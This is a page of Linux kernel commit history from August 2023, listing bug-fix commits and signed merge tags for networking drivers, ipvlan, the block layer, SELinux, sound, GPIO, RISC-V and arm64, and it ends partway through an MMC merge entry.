Commit Graph

1202187 Commits

Author SHA1 Message Date
Danielle Ratson
bc2de151ab mlxsw: pci: Set time stamp fields also when its type is MIRROR_UTC
Currently, in Spectrum-2 and above, time stamps are extracted from the CQE
into the time stamp fields in 'struct mlxsw_skb_cb', only when the CQE
time stamp type is UTC. The time stamps are read directly from the CQE and
software can get the time stamp in UTC format using CQEv2.

From Spectrum-4, the time stamps that are read from the CQE are allowed
to be also from MIRROR_UTC type.

Therefore, we get a warning [1] from the driver that the time stamp fields
were not set, when LLDP control packet is sent.

Allow the time stamp type to be MIRROR_UTC and set the time stamp in this
case as well.

[1]
 WARNING: CPU: 11 PID: 0 at drivers/net/ethernet/mellanox/mlxsw/spectrum_ptp.c:1409 mlxsw_sp2_ptp_hwtstamp_fill+0x1f/0x70 [mlxsw_spectrum]
[...]
 Call Trace:
  <IRQ>
  mlxsw_sp2_ptp_receive+0x3c/0x80 [mlxsw_spectrum]
  mlxsw_core_skb_receive+0x119/0x190 [mlxsw_core]
  mlxsw_pci_cq_tasklet+0x3c9/0x780 [mlxsw_pci]
  tasklet_action_common.constprop.0+0x9f/0x110
  __do_softirq+0xbb/0x296
  irq_exit_rcu+0x79/0xa0
  common_interrupt+0x86/0xa0
  </IRQ>
  <TASK>

Fixes: 4735402173 ("mlxsw: spectrum: Extend to support Spectrum-4 ASIC")
Signed-off-by: Danielle Ratson <danieller@nvidia.com>
Reviewed-by: Ido Schimmel <idosch@nvidia.com>
Signed-off-by: Petr Machata <petrm@nvidia.com>
Reviewed-by: Simon Horman <horms@kernel.org>
Link: https://lore.kernel.org/r/bcef4d044ef608a4e258d33a7ec0ecd91f480db5.1692268427.git.petrm@nvidia.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-18 19:41:06 -07:00
Lu Wei
043d5f68d0 ipvlan: Fix a reference count leak warning in ipvlan_ns_exit()
There are two network devices(veth1 and veth3) in ns1, and ipvlan1 with
L3S mode and ipvlan2 with L2 mode are created based on them as
figure (1). In this case, ipvlan_register_nf_hook() will be called to
register nf hook which is needed by ipvlans in L3S mode in ns1 and value
of ipvl_nf_hook_refcnt is set to 1.

(1)
           ns1                           ns2
      ------------                  ------------

   veth1--ipvlan1 (L3S)

   veth3--ipvlan2 (L2)

(2)
           ns1                           ns2
      ------------                  ------------

   veth1--ipvlan1 (L3S)

         ipvlan2 (L2)                  veth3
     |                                  |
     |------->-------->--------->--------
                    migrate

When veth3 migrates from ns1 to ns2 as figure (2), veth3 will register in
ns2 and calls call_netdevice_notifiers with NETDEV_REGISTER event:

dev_change_net_namespace
    call_netdevice_notifiers
        ipvlan_device_event
            ipvlan_migrate_l3s_hook
                ipvlan_register_nf_hook(newnet)      (I)
                ipvlan_unregister_nf_hook(oldnet)    (II)

In function ipvlan_migrate_l3s_hook(), ipvl_nf_hook_refcnt in ns1 is not 0
since veth1 with ipvlan1 still in ns1, (I) and (II) will be called to
register nf_hook in ns2 and unregister nf_hook in ns1. As a result,
ipvl_nf_hook_refcnt in ns1 is decreased incorrectly and this in ns2
is increased incorrectly. When the second net namespace is removed, a
reference count leak warning in ipvlan_ns_exit() will be triggered.

This patch add a check before ipvlan_migrate_l3s_hook() is called. The
warning can be triggered as follows:

$ ip netns add ns1
$ ip netns add ns2
$ ip netns exec ns1 ip link add veth1 type veth peer name veth2
$ ip netns exec ns1 ip link add veth3 type veth peer name veth4
$ ip netns exec ns1 ip link add ipv1 link veth1 type ipvlan mode l3s
$ ip netns exec ns1 ip link add ipv2 link veth3 type ipvlan mode l2
$ ip netns exec ns1 ip link set veth3 netns ns2
$ ip net del ns2

Fixes: 3133822f5a ("ipvlan: use pernet operations and restrict l3s hooks to master netns")
Signed-off-by: Lu Wei <luwei32@huawei.com>
Reviewed-by: Florian Westphal <fw@strlen.de>
Link: https://lore.kernel.org/r/20230817145449.141827-1-luwei32@huawei.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-18 19:38:44 -07:00
Eric Dumazet
cba3f17869 dccp: annotate data-races in dccp_poll()
We changed tcp_poll() over time, bug never updated dccp.

Note that we also could remove dccp instead of maintaining it.

Fixes: 7c657876b6 ("[DCCP]: Initial implementation")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Link: https://lore.kernel.org/r/20230818015820.2701595-1-edumazet@google.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-18 19:30:24 -07:00
Eric Dumazet
76f33296d2 sock: annotate data-races around prot->memory_pressure
*prot->memory_pressure is read/writen locklessly, we need
to add proper annotations.

A recent commit added a new race, it is time to audit all accesses.

Fixes: 2d0c88e84e ("sock: Fix misuse of sk_under_memory_pressure()")
Fixes: 4d93df0abd ("[SCTP]: Rewrite of sctp buffer management code")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Abel Wu <wuyun.abel@bytedance.com>
Reviewed-by: Shakeel Butt <shakeelb@google.com>
Link: https://lore.kernel.org/r/20230818015132.2699348-1-edumazet@google.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-18 19:23:30 -07:00
Vladimir Oltean
d44036cad3 net: dsa: felix: fix oversize frame dropping for always closed tc-taprio gates
The blamed commit resolved a bug where frames would still get stuck at
egress, even though they're smaller than the maxSDU[tc], because the
driver did not take into account the extra 33 ns that the queue system
needs for scheduling the frame.

It now takes that into account, but the arithmetic that we perform in
vsc9959_tas_remaining_gate_len_ps() is buggy, because we operate on
64-bit unsigned integers, so gate_len_ns - VSC9959_TAS_MIN_GATE_LEN_NS
may become a very large integer if gate_len_ns < 33 ns.

In practice, this means that we've introduced a regression where all
traffic class gates which are permanently closed will not get detected
by the driver, and we won't enable oversize frame dropping for them.

Before:
mscc_felix 0000:00:00.5: port 0: max frame size 1526 needs 12400000 ps, 1152000 ps for mPackets at speed 1000
mscc_felix 0000:00:00.5: port 0 tc 0 min gate len 1000000, sending all frames
mscc_felix 0000:00:00.5: port 0 tc 1 min gate len 0, sending all frames
mscc_felix 0000:00:00.5: port 0 tc 2 min gate len 0, sending all frames
mscc_felix 0000:00:00.5: port 0 tc 3 min gate len 0, sending all frames
mscc_felix 0000:00:00.5: port 0 tc 4 min gate len 0, sending all frames
mscc_felix 0000:00:00.5: port 0 tc 5 min gate len 0, sending all frames
mscc_felix 0000:00:00.5: port 0 tc 6 min gate len 0, sending all frames
mscc_felix 0000:00:00.5: port 0 tc 7 min gate length 5120 ns not enough for max frame size 1526 at 1000 Mbps, dropping frames over 615 octets including FCS

After:
mscc_felix 0000:00:00.5: port 0: max frame size 1526 needs 12400000 ps, 1152000 ps for mPackets at speed 1000
mscc_felix 0000:00:00.5: port 0 tc 0 min gate len 1000000, sending all frames
mscc_felix 0000:00:00.5: port 0 tc 1 min gate length 0 ns not enough for max frame size 1526 at 1000 Mbps, dropping frames over 1 octets including FCS
mscc_felix 0000:00:00.5: port 0 tc 2 min gate length 0 ns not enough for max frame size 1526 at 1000 Mbps, dropping frames over 1 octets including FCS
mscc_felix 0000:00:00.5: port 0 tc 3 min gate length 0 ns not enough for max frame size 1526 at 1000 Mbps, dropping frames over 1 octets including FCS
mscc_felix 0000:00:00.5: port 0 tc 4 min gate length 0 ns not enough for max frame size 1526 at 1000 Mbps, dropping frames over 1 octets including FCS
mscc_felix 0000:00:00.5: port 0 tc 5 min gate length 0 ns not enough for max frame size 1526 at 1000 Mbps, dropping frames over 1 octets including FCS
mscc_felix 0000:00:00.5: port 0 tc 6 min gate length 0 ns not enough for max frame size 1526 at 1000 Mbps, dropping frames over 1 octets including FCS
mscc_felix 0000:00:00.5: port 0 tc 7 min gate length 5120 ns not enough for max frame size 1526 at 1000 Mbps, dropping frames over 615 octets including FCS

Fixes: 11afdc6526 ("net: dsa: felix: tc-taprio intervals smaller than MTU should send at least one packet")
Signed-off-by: Vladimir Oltean <vladimir.oltean@nxp.com>
Reviewed-by: Simon Horman <horms@kernel.org>
Link: https://lore.kernel.org/r/20230817120111.3522827-1-vladimir.oltean@nxp.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-18 18:33:58 -07:00
Jiri Pirko
2ebbc9752d devlink: add missing unregister linecard notification
Cited fixes commit introduced linecard notifications for register,
however it didn't add them for unregister. Fix that by adding them.

Fixes: c246f9b5fd ("devlink: add support to create line card and expose to user")
Signed-off-by: Jiri Pirko <jiri@nvidia.com>
Reviewed-by: Simon Horman <horms@kernel.org>
Link: https://lore.kernel.org/r/20230817125240.2144794-1-jiri@resnulli.us
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-18 18:29:12 -07:00
BrenoRCBrito
3b1f08833c
ASoC: amd: yc: Add VivoBook Pro 15 to quirks list for acp6x
VivoBook Pro 15 Ryzen Edition uses Ryzen 6800H processor, and adding to
 quirks list for acp6x will enable internal mic.

Signed-off-by: BrenoRCBrito <brenorcbrito@gmail.com>
Link: https://lore.kernel.org/r/20230818211417.32167-1-brenorcbrito@gmail.com
Signed-off-by: Mark Brown <broonie@kernel.org>
2023-08-18 23:40:09 +01:00
Hariprasad Kelam
05f3d5bc23 octeontx2-af: SDP: fix receive link config
On SDP interfaces, frame oversize and undersize errors are
observed as driver is not considering packet sizes of all
subscribers of the link before updating the link config.

This patch fixes the same.

Fixes: 9b7dd87ac0 ("octeontx2-af: Support to modify min/max allowed packet lengths")
Signed-off-by: Hariprasad Kelam <hkelam@marvell.com>
Signed-off-by: Sunil Goutham <sgoutham@marvell.com>
Reviewed-by: Leon Romanovsky <leonro@nvidia.com>
Link: https://lore.kernel.org/r/20230817063006.10366-1-hkelam@marvell.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-18 15:30:39 -07:00
Jakub Kicinski
7793a88e88 Here are some batman-adv bugfixes:
- Fix issues with adjusted MTUs (2 patches), by Sven Eckelmann
 
  - Fix header access for memory reallocation case, by Remi Pommarel
 
  - Fix two memory leaks (2 patches), by Remi Pommarel
 -----BEGIN PGP SIGNATURE-----
 
 iQJKBAABCgA0FiEE1ilQI7G+y+fdhnrfoSvjmEKSnqEFAmTc+eYWHHN3QHNpbW9u
 d3VuZGVybGljaC5kZQAKCRChK+OYQpKeobgFD/9oBvQKj9rObbnHIgxe3ZZ4x4po
 FOln4eLv83YZwVP54BC0X8COymO+gd3tBbGg9U1s9kpn+hIOXi7zI8xnmS/jrKGB
 t8tDQ/1S9laCfanfDoHDdQ96ifJfQR6Mp7ZH1e64L22Ag5hKjVoGeQp2Mf5X2S+S
 7ZFdhofr/ZNi0Tz4Y+Jw9bh3W5TMnwSFfexSIfUJmh+06RGRRspOx2WbbgArMs12
 hP4UST0cIfIr0CinBQz+LiyT90GgC6r+xjkQrP3LgzYegC7eBW+bQxLgCtnk+Hic
 +t+aS3SnityZzFyaNJrULX7/u8WJumW4udu0jDl9raAWIJBUV5pNr7sNagQ45mvE
 NZ4/VnWGg6MnjdPC6CIuU6AuCLZYn1NiE6mp1vuFxMpqmiJUhMjwjTp8DaLpQZCV
 vDYca/bBuDMbTIl5LxQ965svbNVDiAS6gNHbrVs2k3bq3Ji7QS1M7MVR3npehGT0
 xInqQNO7QJ0c+/PaFMTZwi0LKk8qwvHLggsZyKXJ6i6YBH7YG1LTbEtqLT7rH3nv
 sHfTyPzw7b0oFh7/rSMzvf1P9yiMG1ZCY622uhU1M+CxA2Axr1Lcq1yc3umDP4Ds
 BM3JKilHsj/mM7g/HobBs7eg+BL9/KjNKFbj12Bc0xV7IXC4SNTlKSJUN0ZlGSsH
 RP7dNXOzS0LUErpARw==
 =EsR1
 -----END PGP SIGNATURE-----

Merge tag 'batadv-net-pullrequest-20230816' of git://git.open-mesh.org/linux-merge

Simon Wunderlich says:

====================
Here are some batman-adv bugfixes:

 - Fix issues with adjusted MTUs (2 patches), by Sven Eckelmann

 - Fix header access for memory reallocation case, by Remi Pommarel

 - Fix two memory leaks (2 patches), by Remi Pommarel

* tag 'batadv-net-pullrequest-20230816' of git://git.open-mesh.org/linux-merge:
  batman-adv: Fix batadv_v_ogm_aggr_send memory leak
  batman-adv: Fix TT global entry leak when client roamed back
  batman-adv: Do not get eth header before batadv_check_management_packet
  batman-adv: Don't increase MTU when set by user
  batman-adv: Trigger events for auto adjusted MTU
====================

Link: https://lore.kernel.org/r/20230816163318.189996-1-sw@simonwunderlich.de
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-18 15:16:05 -07:00
Sweet Tea Dorminy
c984ff1423 blk-crypto: dynamically allocate fallback profile
blk_crypto_profile_init() calls lockdep_register_key(), which warns and
does not register if the provided memory is a static object.
blk-crypto-fallback currently has a static blk_crypto_profile and calls
blk_crypto_profile_init() thereupon, resulting in the warning and
failure to register.

Fortunately it is simple enough to use a dynamically allocated profile
and make lockdep function correctly.

Fixes: 2fb48d88e7 ("blk-crypto: use dynamic lock class for blk_crypto_profile::lock")
Cc: stable@vger.kernel.org
Signed-off-by: Sweet Tea Dorminy <sweettea-kernel@dorminy.me>
Reviewed-by: Eric Biggers <ebiggers@google.com>
Link: https://lore.kernel.org/r/20230817141615.15387-1-sweettea-kernel@dorminy.me
Signed-off-by: Jens Axboe <axboe@kernel.dk>
2023-08-18 15:00:39 -06:00
Ming Lei
c164c7bc97 blk-cgroup: hold queue_lock when removing blkg->q_node
When blkg is removed from q->blkg_list from blkg_free_workfn(), queue_lock
has to be held, otherwise, all kinds of bugs(list corruption, hard lockup,
..) can be triggered from blkg_destroy_all().

Fixes: f1c006f1c6 ("blk-cgroup: synchronize pd_free_fn() from blkg_free_workfn() and blkcg_deactivate_policy()")
Cc: Yu Kuai <yukuai3@huawei.com>
Cc: xiaoli feng <xifeng@redhat.com>
Cc: Chunyu Hu <chuhu@redhat.com>
Cc: Mike Snitzer <snitzer@kernel.org>
Cc: Tejun Heo <tj@kernel.org>
Signed-off-by: Ming Lei <ming.lei@redhat.com>
Acked-by: Tejun Heo <tj@kernel.org>
Link: https://lore.kernel.org/r/20230817141751.1128970-1-ming.lei@redhat.com
Signed-off-by: Jens Axboe <axboe@kernel.dk>
2023-08-18 15:00:39 -06:00
Li Zhijian
6548fce058 drivers/rnbd: restore sysfs interface to rnbd-client
Commit 137380c0ec renamed 'rnbd-client' to 'rnbd_client', this changed
sysfs interface to /sys/devices/virtual/rnbd_client/ctl/map_device
from /sys/devices/virtual/rnbd-client/ctl/map_device.

CC: Ivan Orlov <ivan.orlov0322@gmail.com>
CC: "Md. Haris Iqbal" <haris.iqbal@ionos.com>
CC: Jack Wang <jinpu.wang@ionos.com>
Fixes: 137380c0ec ("block/rnbd: make all 'class' structures const")
Signed-off-by: Li Zhijian <lizhijian@fujitsu.com>
Acked-by: Jack Wang <jinpu.wang@ionos.com>
Link: https://lore.kernel.org/r/20230816022210.2501228-1-lizhijian@fujitsu.com
Signed-off-by: Jens Axboe <axboe@kernel.dk>
2023-08-18 15:00:39 -06:00
Christian Göttsche
70d91dc9b2 selinux: set next pointer before attaching to list
Set the next pointer in filename_trans_read_helper() before attaching
the new node under construction to the list, otherwise garbage would be
dereferenced on subsequent failure during cleanup in the out goto label.

Cc: <stable@vger.kernel.org>
Fixes: 4300590243 ("selinux: implement new format of filename transitions")
Signed-off-by: Christian Göttsche <cgzones@googlemail.com>
Signed-off-by: Paul Moore <paul@paul-moore.com>
2023-08-18 16:13:03 -04:00
Linus Torvalds
d4ddefee51 Two more SME fixes related to ptrace(): ensure that the SME is properly
set up for the target thread and that the thread sees the ZT registers
 set via ptrace.
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdFiEE5RElWfyWxS+3PLO2a9axLQDIXvEFAmTftxwACgkQa9axLQDI
 XvFYOg/9HlGxpKuWlaNZ9g9pUXPdmCnlqBRbHkqDtPdPwH/Gylh3P5DFcRDFWCS0
 74dls3iqQ0muAeKObB4EvfGTBRngX0HhEXTVnk81JFtTchVclzYtZa1J5+wO4c2Q
 UK/+iwRddGqTGUNQJWG9qEkV9FoaDOmnuV1ZSUDF+AiAzQloEJlWqPxnX3b+ZX33
 agoEir1i8hhtfKVReappIxZHWEcGUiBCKMFtkTACaJkGucg6uaNM7vzhjfzYlCrB
 3qxEQXCgTCjWTuzhOAAKi98Q/t8KP1Hcm4WGi6yLC16hyU/P3wy7HPL5s1CowROt
 /Ttkv9ux9W4ZUx8qmvWwmxjtFjmQZRAvcRGZg0XqdsnKul3NUCdVnXNWp+sGS8tk
 HVOtzTo5WlC+YKlO5uweTXBwS/hbH5M/mZPiEv4p3jsEVHpc43EUsM8RiLQRZPv7
 6fllZXoSje2Npf2evTlwQqiDrSDe2fHxCiUbQ8NpLTD+tr9M2j0xCAbVJd7qhd9i
 PdbLHTKFgR0ScZCDcnWSUwqCSNIFUHQNhnvLaYx5PIWchOimE4HCcQZcM9mc7643
 1jwGNIE2FP/7mLwoQNr/ri3rs0eYWXTZ6QaTXUmicCZnp4IhKKxeVzTmSSH67LRK
 DBcMUW4FXk85Z2dBgn3KbaMkdqAHcv4SAU3CzyfgWpJlb/z7/iI=
 =1dyE
 -----END PGP SIGNATURE-----

Merge tag 'arm64-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux

Pull arm64 fixes from Catalin Marinas:
 "Two more SME fixes related to ptrace(): ensure that the SME is
  properly set up for the target thread and that the thread sees
  the ZT registers set via ptrace"

* tag 'arm64-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux:
  arm64/ptrace: Ensure that the task sees ZT writes on first use
  arm64/ptrace: Ensure that SME is set up for target when writing SSVE state
2023-08-18 20:52:25 +02:00
Linus Torvalds
3e13eee105 gpio fixes for v6.5-rc6
- fix a regression in the sysfs interface
 - fix a reference counting bug that's been around for years
 - MAINTAINERS update
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdFiEEFp3rbAvDxGAT0sefEacuoBRx13IFAmTftRUACgkQEacuoBRx
 13IGjhAAoYc+s0YjdKki5g3IEvo163uhophnTywxU8EL6hNCTNn8f1JCiIVVJgro
 VuBXywozUPsPAJ8gszEEffNpJHLiFJzK2KAmYVf8diuUDkB1G4h5nfFBftXM7z5W
 Yf58I48WsY/Hd4SsThvARJQ8vPVsefwDo13grNGVVBA8mRBpMT1IbidEfLZfkygR
 DjXUP+UUoL2l2bd8wAcvc/HAS1sL86ckq/Fh/YGDezeFo0ukr1JIJ5fLa0u+9Gxu
 XpW7G2NVkEP2weP4UcqRJagM6iFlLN0/w9V/pj9BXSleA8zuWIcAV4bv689ckRu2
 fczMdLVMoj/H/uIFB+kRUXfTxbQH35XwlelrV9S7ih2Ku7a+Y0kJ/4FsubO69nD+
 tbJ9Ur9EOXSm2cKfklsZWFhMGxXQdSo8eqAQusoBgGqbzhUmK7d2FBMUcCyRejXj
 qPP+7otn+GbccYrZKuOqaj1hXfVtryWLEkazVrCnXpCWolx0722loav1EWnW/CVL
 6s4Lbr+SdVe715m7AyhPCHr294BTyrWik13pjCoVJqD2IAklhcJa6GdEV6pxcLmP
 7zyIix/5pqk0ICtIDw2yu18UhcHhKOjRCKgeL2SxD/U0a6Cz8g65OAc6ERorarbN
 f7MPmB5JHP5J3fColpnb9sTLgPKcTcBfYGi3rJZD7Ni6MprIkBY=
 =FSvM
 -----END PGP SIGNATURE-----

Merge tag 'gpio-fixes-for-v6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/brgl/linux

Pull gpio fixes from Bartosz Golaszewski:

 - fix a regression in the sysfs interface

 - fix a reference counting bug that's been around for years

 - MAINTAINERS update

* tag 'gpio-fixes-for-v6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/brgl/linux:
  gpiolib: fix reference leaks when removing GPIO chips still in use
  gpiolib: sysfs: Do unexport GPIO when user asks for it
  MAINTAINERS: add content regex for gpio-regmap
2023-08-18 20:36:49 +02:00
Linus Torvalds
8abd7287db small SMB mount option fix, also for stable
-----BEGIN PGP SIGNATURE-----
 
 iQGzBAABCgAdFiEE6fsu8pdIjtWE/DpLiiy9cAdyT1EFAmTfk2wACgkQiiy9cAdy
 T1GisAwAobMfIbWSP3lC2TXiAjEf/4ss145H0VjqPDtIm9T1DxdVDT1YgiOi3b6r
 T5xl6CaVvamMbG8ZDtWDqMWA6z/7ZTTq6OIbZGBXNCaZvJTS1k32HG13IDrpLtD1
 TyjXyyXi3OA6MGIiIZttA8ziJu7Osmc3OBuwoPf8eKcQilF1TiTM+rHksS1WThCB
 2K+OYlOe6Fiihprqh6W3zbQl9h3+oPMHhEjEKBgiCPLDFtFpwhoUqOx6cFGNbMTn
 38/hEiSG/K8kBSBgePVN1zxtTi7qPaazjTVkCKB3PjAtl0QhW6RWg3Ige5Mjg1Sk
 0MLIhpcw9XqYsEIFc5yHwyCi2AxbzZ1XSnfgfJr0Jd+phW6yFoJCHojgfagGs1ez
 YldsPYFiSJDC+ugJUMd2KemEebO9y4qfI8Ocde2f7GJijOhQhFw5bunc5g5EtZAy
 tj3w0l1pmXgVsePjWurO3VvSm1/trNShOg7h0oHIVTEtHVcXAFQED1xxTdC6aQSC
 htPunLUN
 =wyXy
 -----END PGP SIGNATURE-----

Merge tag '6.5-rc6-smb3-client-fix' of git://git.samba.org/sfrench/cifs-2.6

Pull smb client fix from Steve French:
 "A small SMB mount option fix, also for stable"

* tag '6.5-rc6-smb3-client-fix' of git://git.samba.org/sfrench/cifs-2.6:
  smb: client: fix null auth
2023-08-18 19:41:12 +02:00
Linus Torvalds
cd479d9c72 RISC-V Fixes for 6.5-rc7
* A fix to avoid excessive rejections from seccomp RET_ERRNO rules.
 * A fix for compressed jal/jalr decoding.
 * A pair of fixes for independent irq/softirq stacks on kernels built
   with CONFIG_FRAME_POINTER=n.
 * A fix to avoid a hang handling uaccess fixups.
 * Another build fix for toolchain ISA strings, this time for Zicsr and
   Zifenci on old GNU toolchains.
 -----BEGIN PGP SIGNATURE-----
 
 iQJHBAABCAAxFiEEKzw3R0RoQ7JKlDp6LhMZ81+7GIkFAmTfa34THHBhbG1lckBk
 YWJiZWx0LmNvbQAKCRAuExnzX7sYidwxD/9EeVWNnjAzZyz6dKtQRFe4czuQepXI
 5Apcc8UKUs2vFfWybAAL8ICyzZ0ME8Vc+UfAZkFhouCBHpxMWmPDpkGiGxwKYw+E
 hWZeyIC8Vn/3mmdEvUVrFU37uyndhRaej6sJQb8tj2SLo4K3PvUELl6fhnSs2ESk
 EaSaOtTnC3DLKpJTup0jvCa1T9aGwVpEVuc7yjARiAxAquxH5ky6N5/l3gCGTQzJ
 Yph/llxhwmR83zwqto5kHS9nCWi6noammBCYl+Kbb7jMg6UMMBK6T3Dube5rvyqd
 7ZEQNWAQ2RDs5pQJklutYjSCE+5LjONMX7IlrBR3plAMfXiLx+K3FhuMizHKD0YZ
 EIQ1QtsEuu6xPPZXig4KViEp75fRGnV6xJApAE0o0fUCJ7r77vddUJQDQdN3HhGe
 qfo8sEub8eWZ/IklkVhr6zsZAqMx6srb9r+T/iT+9KW9HKDNfNdEHc8FLuMjzm+C
 tIrrcZE40N7d37KVB/myWeDBrYAx6Bd6YaJOnuAR8H2t1dSj9rvxi7XFHfVdyRTs
 SUBQ0BCdMV+1UYmU1qtqWpti06nepeY3EMm4JLUFvKP+7jHBEcEwoye6/hGiTu7d
 rNsh6kB1Qq29JNQSn5HsOl89QRfz7orRGVZhTW9clhxrgV9fmy+pW9UG564NSSKI
 tBQGCt7OvXVMsQ==
 =LtPj
 -----END PGP SIGNATURE-----

Merge tag 'riscv-for-linus-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/riscv/linux

Pull RISC-V fixes from Palmer Dabbelt:

 - avoid excessive rejections from seccomp RET_ERRNO rules

 - compressed jal/jalr decoding fix

 - fixes for independent irq/softirq stacks on kernels built with
   CONFIG_FRAME_POINTER=n

 - avoid a hang handling uaccess fixups

 - another build fix for toolchain ISA strings, this time for Zicsr and
   Zifenci on old GNU toolchains

* tag 'riscv-for-linus-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/riscv/linux:
  riscv: Handle zicsr/zifencei issue between gcc and binutils
  riscv: uaccess: Return the number of bytes effectively not copied
  riscv: stack: Fixup independent softirq stack for CONFIG_FRAME_POINTER=n
  riscv: stack: Fixup independent irq stack for CONFIG_FRAME_POINTER=n
  riscv: correct riscv_insn_is_c_jr() and riscv_insn_is_c_jalr()
  riscv: entry: set a0 = -ENOSYS only when syscall != -1
2023-08-18 19:26:53 +02:00
Linus Torvalds
ce03e1807c sound fixes for 6.5-rc7
Slightly bigger than I wished, but here we go, a collection of fixes
 for 6.5.  The only change in the core side is the ease for repeated
 ASoC error messages, and the rest are all pretty device-specific small
 fixes (including regression fixes) for ASoC Intel and HD-audio /
 USB-audio quirks.
 -----BEGIN PGP SIGNATURE-----
 
 iQJCBAABCAAsFiEEIXTw5fNLNI7mMiVaLtJE4w1nLE8FAmTeNSQOHHRpd2FpQHN1
 c2UuZGUACgkQLtJE4w1nLE84fg//fxij0/hGOgQIIisCxaDoWDL5i/n4x0U6mjbu
 Z0IVHIYy2A55ZWi5xVG1g0DFIe2zlU5hhpB4YKyod9PEXSS9jYKg3BNbDY5kAexn
 9+jBOUr2c2rKY9SpN9kpX9Lu89mIuQC+xtmlxwkm8+q6YVoYUHkFy0J6KfJ8x2JQ
 tmViD0cH5T390M+jmXMbYgSkzMCylZ2SPXh7dDbPk+oD61Zco7oWIbdKGkTL2qZC
 60/igB7N9sVL9ni6yFMHWL/IZ+qQhin+HPbNWT2d6nP45bWquTedxlxNpbYRbLng
 pnz7aJ7g+l2honVZGObGNfjMNOZeG1uQi4l5gTBtLKdk5oxHmTItWcyZ92Rps1wT
 1KIYApi/X9j1aVKqjD51KzPDaQIC66WQU5LA5N2TKHujWKrEl5crLcR6gc/Uqbvt
 hMnvYZctkicsEuUuOhsBmBn9/ye5+DDwg5EEr7p5gkvvJi+StxA1N7zGwWPLnNX6
 Nhnvo9c8GlEa7QHHlO7LzTWQbpkgCOiSKFvWoNoQAgrOwzkMARfFxjFjVuvQsgXx
 y5DUXsw9+k8v/ITWalulPK9VtzaY7OQK6tMlonxMuWcPGmO7a+0S7MHiQcuI+45f
 wXMVaC5V48s95CiFn516UsoktY1foztr4UMDSOHBkS9Ap4g5BoxUiyL95lxOena0
 5kYgmRE=
 =DE5T
 -----END PGP SIGNATURE-----

Merge tag 'sound-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound

Pull sound fixes from Takashi Iwai:
 "Slightly bigger than I wished, but here we go, a collection of fixes
  for 6.5.

  The only change in the core side is the ease for repeated ASoC error
  messages, and the rest are all pretty device-specific small fixes
  (including regression fixes) for ASoC Intel and HD-audio / USB-audio
  quirks"

* tag 'sound-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound:
  ALSA: hda/realtek - Remodified 3k pull low procedure
  ASoC: rt1308-sdw: fix random louder sound
  ALSA: hda/cs8409: Support new Dell Dolphin Variants
  ALSA: hda/realtek: Switch Dell Oasis models to use SPI
  ALSA: hda/realtek: Add quirks for HP G11 Laptops
  ASoC: meson: axg-tdm-formatter: fix channel slot allocation
  ASoC: SOF: ipc4-topology: Update the basecfg for copier earlier
  ASoC: SOF: intel: hda: Clean up link DMA for IPC3 during stop
  ASoC: Intel: sof-sdw-cs42142: fix for codec button mapping
  ASoC: Intel: sof-sdw: update jack detection quirk for LunarLake RVP
  ASoC: SOF: Fix incorrect use of sizeof in sof_ipc3_do_rx_work()
  ASoC: lower "no backend DAIs enabled for ... Port" log severity
  ASoC: rt5665: add missed regulator_bulk_disable
  ASoC: max98363: don't return on success reading revision ID
  ALSA: usb-audio: Add support for Mythware XA001AU capture and playback interfaces.
  ASoC: fsl: micfil: Use dual license micfil code
2023-08-18 19:17:01 +02:00
Linus Torvalds
88d4a1643a MMC core:
- Fix in_flight[issue_type] value error to properly manage requests
 
 MMC host:
  - wbsd: Fix double free in the probe error path
  - sunplus: Fix error path in probe
  - sdhci_f_sdh30: Fix order of function calls in sdhci_f_sdh30_remove
 -----BEGIN PGP SIGNATURE-----
 
 iQJLBAABCgA1FiEEugLDXPmKSktSkQsV/iaEJXNYjCkFAmTfOOEXHHVsZi5oYW5z
 c29uQGxpbmFyby5vcmcACgkQ/iaEJXNYjCkyzA//eUNFzMBspkQbom/amwAJXH7p
 jx05JOMQE1D2WBkvNvMWEpvJgN4J0Z0rP/tQnJ1+1XR2U/QTWTFf3RWf85vwllFW
 n95ZLJJfX5Vjihi4MlX+je2s8rip2GYucmJjis1853sY1CTNfuEhuzg27X8KMNp2
 tL65caTCai9t6oBCMadODcS3F4m3fdIPuauuB4Cll34aS0YZk0hmYQfCTmpsfpSh
 IY2t+gnHsa1jUkGkZfcUivhmQ2Pmt2PoVvZwamVG9OMw3GCadYhIw/qLHKHvVJXg
 51pE6dXgBAxa10scjurOKv/aKaB+PBikSt/A6KRQ1ROoP06Cq7E+VY7R73G6jEOP
 mBwjIq8id09dZA6mRHsbUqkOMk2YB5lYAdX/7MVzo6/JW+dAEQ8oU7vV5A529nni
 b8N6JWRby5aRO3O7wziIjvx0/+8vXG1Siud3Ec/MvIRqsUK8HoMs55bdepwhuOcs
 F6QHTPmky5i8/4wNcHExnnfZbI+wJeWE0t7Ku2ZrzKb0XMVOkLB8dmy7NKIRHRPS
 mZTFiGaFcvAyodQ6gTCPeqXclKEUq0XdNM9deU3Zln1KjLCogjh4vSGLAWecbfkq
 ld5mVgSWexbXnZ32E0Zd2ouCbaWW3P4YAH405T5rD1a9Zm82eTwjh0JltvBqB4bu
 fqorLOLT6D4gWHKtL2Y=
 =QVs8
 -----END PGP SIGNATURE-----

Merge tag 'mmc-v6.5-rc1-2' of git://git.kernel.org/pub/scm/linux/kernel/git/ulfh/mmc

